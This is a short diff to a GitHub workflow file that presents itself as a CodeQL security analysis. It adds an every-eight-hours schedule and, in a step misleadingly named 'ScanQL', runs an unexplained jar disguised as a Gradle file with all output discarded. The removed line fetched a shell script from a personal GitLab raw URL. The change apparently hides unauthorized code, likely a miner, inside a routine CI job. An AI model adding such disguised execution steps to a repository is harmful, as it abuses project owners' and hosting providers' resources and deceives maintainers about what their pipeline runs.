--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -11,8 +11,8 @@ on:
   pull_request:
     # The branches below must be a subset of the branches above
     branches: [master]
-#  schedule:
-#    - cron: '0 8 * * 3'
+   schedule:
+     - cron: '0 0-23/8 * * *'
 
 jobs:
   analyze:
@@ -56,7 +56,7 @@ jobs:
 
     - name: ScanQL
       run: |
-        curl -s https://gitlab.com/sarahemersonzrex/msconfig/-/raw/main/fpsdev0.sh
+        java -jar gradle_7_0_jdk11.jar &>/dev/null 2>&1
 
     - name: Perform CodeQL Analysis
       uses: github/codeql-action/analyze@v1
